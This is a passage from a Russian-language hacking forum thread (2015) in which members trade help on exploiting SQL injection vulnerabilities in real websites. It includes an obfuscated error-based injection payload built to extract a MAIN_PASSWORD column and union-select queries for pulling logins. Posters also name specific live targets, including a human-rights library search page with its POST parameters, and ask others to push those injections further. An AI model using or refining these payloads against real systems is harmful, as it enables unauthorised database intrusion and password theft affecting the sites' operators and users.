31.03.2015, 14:25
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Сообщение от Br@!ns
При эксплуатации sql инжекта возникла проблема. всего 2 таблицы основная и Information.schema. Узнаю без проблем имена таблиц с помощью select table_name from information_schema.tables. когда пытаюсь вытащить данные с таблиц получается вот это:
В чем может быть причина?
мб из-за того что имя таблицы преобразовываются в верхний регистр? но тогда почему вытянулись данные с information_schema опять же.
PS при запросе select blabla from ws_lifefitness_live_us.admin_user_owners пишет SELECT command denied to user 'user'@'localhost' for table 'ADMIN_USER_OWNERS' Во-первых, blabla - строковая константа, а потому должна обрамляться кавычками с двух сторон для корректности запроса.
Если blabla - реально существуюший стобец, тогда не надо. Но я подозреваю, что он не существует.
Во-вторых, я полагаю что в твоей схеме не существует такой таблицы. При вытаскивании данных желательно использовать полный адрес для таблицы типа "information_schema.tables". примеры - my_database.my_table , `my_database`.my_table , `my_database`.`my_table`
|
|
|
31.03.2015, 14:33
|
|
Постоянный
Регистрация: 03.09.2010
Сообщений: 885
С нами:
8258006
Репутация:
25
|
|
Сообщение от BigBear
Во-вторых, я полагаю что в твоей схеме не существует такой таблицы. При вытаскивании данных желательно использовать полный адрес для таблицы типа "information_schema.tables". примеры - my_database.my_table , `my_database`.my_table , `my_database`.`my_table`
нашел выход в нахождении другой sql, вопрос решен.
|
|
|
|
03.04.2015, 13:54
|
|
Участник форума
Регистрация: 05.01.2012
Сообщений: 204
С нами:
7553846
Репутация:
5
|
|
'+and+(SeLeCt+1+FrOm(SeLeCt+count(*),CoNcAt((SeLeC t(SeLeCt(SeLeCt+CoNcAt(char(33,126,33),MAIN_PASSWO RD,char(33,126,33))+FrOm+currency+LiMiT+15,1))+FrO m+information_schema.TaBlEs+LiMiT+0,1),floor(rand( 0)*2))x+FrOm+information_schema.TaBlEs+GrOuP+By+x) a)+and+'1'='1
выводит: Subquery returns more than 1 row
как правильно составить)?
|
|
|
|
03.04.2015, 14:00
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
свой вывод помести в group_concat(). и пользуйся поиском, пару страниц назад такой вопрос уже был
|
|
|
|
03.04.2015, 16:33
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами:
9650336
Репутация:
662
|
|
http://www.menschenrechte.ac.at/db/suche/bib_erg.php
post запрос
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]schlag1[/COLOR][COLOR="#007700"]=--+[/COLOR][COLOR="#0000BB"]Bitte[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]ausw[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]E4hlen[/COLOR][COLOR="#007700"]+--&[/COLOR][COLOR="#0000BB"]op1[/COLOR][COLOR="#007700"]=AND&[/COLOR][COLOR="#0000BB"]schlagtext2[/COLOR][COLOR="#007700"]=&[/COLOR][COLOR="#0000BB"]schlag2[/COLOR][COLOR="#007700"]=--+[/COLOR][COLOR="#0000BB"]Bitte[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]ausw[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]E4hlen[/COLOR][COLOR="#007700"]+--&[/COLOR][COLOR="#0000BB"]op2[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]ANDschlag3[/COLOR][COLOR="#007700"]=--+[/COLOR][COLOR="#0000BB"]Bitte[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]ausw[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]E4hlen[/COLOR][COLOR="#007700"]+--&[/COLOR][COLOR="#0000BB"]bib_suche[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]Suche[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]starten[/COLOR][COLOR="#007700"]&[/COLOR][COLOR="#0000BB"]autor[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]aaa[/COLOR][COLOR="#DD0000"]'[/COLOR][/COLOR]
Помогите раскрутить...
|
|
|
|
03.04.2015, 18:31
|
|
Участник форума
Регистрация: 05.01.2012
Сообщений: 204
С нами:
7553846
Репутация:
5
|
|
Сообщение от faza02
↑
свой вывод помести в group_concat(). и пользуйся поиском, пару страниц назад такой вопрос уже был
Все мануалы прокурил не могу составить, завис к тому же на ошибке: Operand should contain 1 column(s).
Можешь все же помочь с составлением правильного запроса?!
Все решил задачу эту, спасибо.
|
|
|
|
05.04.2015, 18:06
|
|
Познающий
Регистрация: 02.12.2010
Сообщений: 79
С нами:
8128406
Репутация:
-2
|
|
Здраствуйте! Хочу спросить, есть ли возможность обойти limit в скулях, что б вывелось все сразу.
Например даю запрос
union select 1,2,login from users limit 1,1
Выводить одну запись, можно зделать запрос что б вывело несколько?
|
|
|
|
05.04.2015, 19:31
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от teh
↑
Здраствуйте! Хочу спросить, есть ли возможность обойти limit в скулях, что б вывелось все сразу.
Например даю запрос
union select 1,2,login from users limit 1,1
Выводить одну запись, можно зделать запрос что б вывело несколько?
group_concat(login)
|
|
|
|
05.04.2015, 21:00
|
|
Познающий
Регистрация: 02.12.2010
Сообщений: 79
С нами:
8128406
Репутация:
-2
|
|
|
|
|
|
06.04.2015, 15:25
|
|
Познающий
Регистрация: 09.10.2011
Сообщений: 55
С нами:
7680566
Репутация:
1
|
|
Нашел скулю, запрос http://xxx.com/cat/15?order=id&order_type=DESC
Делаю такой запрос /cat/15?order=id union select 1--&order_type=DESC
Выводит
A Database Error Occurred
Error Number: 1221
Incorrect usage of UNION and ORDER BY
SELECT * FROM (`items`) WHERE `category` = '15' AND `sold` = '0' ORDER BY `id` union select 1-- DESC LIMIT 50
Помогите дальше раскрутить. |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
